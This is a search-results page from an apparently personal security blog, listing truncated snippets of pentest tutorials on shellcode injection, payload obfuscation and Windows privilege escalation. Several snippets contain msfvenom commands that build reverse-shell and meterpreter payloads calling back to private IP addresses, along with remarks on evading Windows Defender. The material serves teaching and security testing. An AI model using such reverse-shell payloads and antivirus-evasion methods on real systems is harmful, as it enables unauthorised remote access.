Search
You can find the results of your search below.
Matching pagenames:
Fulltext results:
- FatCat Attack PoC
- | Privilege Escalation((https://github.com/frizb/Windows-Privilege-Escalation)) | AlwaysInstallElevated ((https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated)) | | @#58D3F7:**Actions on Objectives*... rate payload <code dos>msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.
- Obfuscation: Disguise shellcode as UUIDs
- {{tag>IT-Security Windows Kali pentest obfuscation blog english}} ====== Obfuscation: Disguise shellcode a... hat I used for testing was immediately blocked by Windows Defender. I therefore had to adapt the loader and... yption or encoding. This is usually recognised by Windows Defender. <code bash> python shencode.py create -c="-p windows/x64/shell/reverse_tcp LHOST=IPADDRESS LPORT=PORT
- Privilege escalation: Windows admin thanks to Linux
- {{tag>it-security windows linux blog english}} ====== Privilege escalation: Windows admin thanks to Linux ====== In this tutorial, ... ll show you how to secure administrator rights on Windows PCs using a live boot CD. We will simulate two sc... ystem. \\ \\ ===== Initial situation ===== On a Windows system, the users ''users'' and ''sysadmin'' are
- Shellcode Injection Part 2
- {{tag>it-security windows kali pentest blog english}} ====== Shellcode Injection Part 2 ====== {{it-securi... . This form of injection is usually recognised by Windows Defender, so we will again use some obfuscation m... r. The output is binary: <code bash> msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.28.126.97 LPORT=4... ub.com/fritzone/obfy )) was an immediate success. Windows Defender could no longer recognise the compiled f
- Shellcode Injection Part 1
- {{tag>it-security windows kali pentest blog english}} ====== Shellcode Injection Part 1 ====== In this ser... ve to the file shell.c | <code bash> msfvenom -p windows/shell_reverse_tcp LHOST=172.23.61.130 LPORT=445 -... ocess-injection.cpp> #include <stdio.h> #include <Windows.h> //shell.c unsigned const char payload[] = "\... shellcode in raw format: <code bash> msfvenom -p windows/shell_reverse_tcp LHOST=172.23.61.130 LPORT=445 -
- Shellcode Injection Part 3
- {{tag>IT-Security Windows Kali pentest blog english}} ====== Shellcode Injection Part 3 ====== {{it-securi... ile 143 / +7 marks the beginning of the filename (WindowsAgent.py) lea edx, [esi + 7] ;Zeile 184 / command line to execute db "python WindowsAgent.py", 0 ;Zeile 192 / our URL db "http://172... e === We have to create the shellcode as ''%%x86 Windows%%'' binary file. We do this with ''%%nasm%%'': <
- Shellcode Injection Part 4
- {{tag>IT-Security Windows Kali pentest blog english}} ====== Shellcode Injection Part 4 ====== {{it-securi... ts should be met: * Start of ''calc.exe'' on a Windows computer * 64-bit code * Avoid null bytes ==... e address ==== Each time a process is started in Windows, modules are loaded into this process. One of these modules is our ''kernel32.dll''. Windows creates data structures in the working memory tha
- Obfuscation: polymorphic in-memory decoder
- {{tag>IT-Security Windows Kali pentest obfuscation blog english}} ====== Obfuscation: polymorphic in-memor... pile it. <code cpp> #include <stdio.h> #include <windows.h> #include <iostream> #pragma warning unsigned ... on tests. During my test, even the Metasploit payload was not detected by Windows Defender. ~~DISCUSSION~~
- The importance of awareness in IT security
- file that was sent as an attachment in an email. Windows integrated it and the malware was able to spread.
- Obfuscation: ByteSwapping
- {{tag>IT-Security Windows Kali shellcode blog english}} ====== Obfuscation: ByteSwapping ====== {{it-secu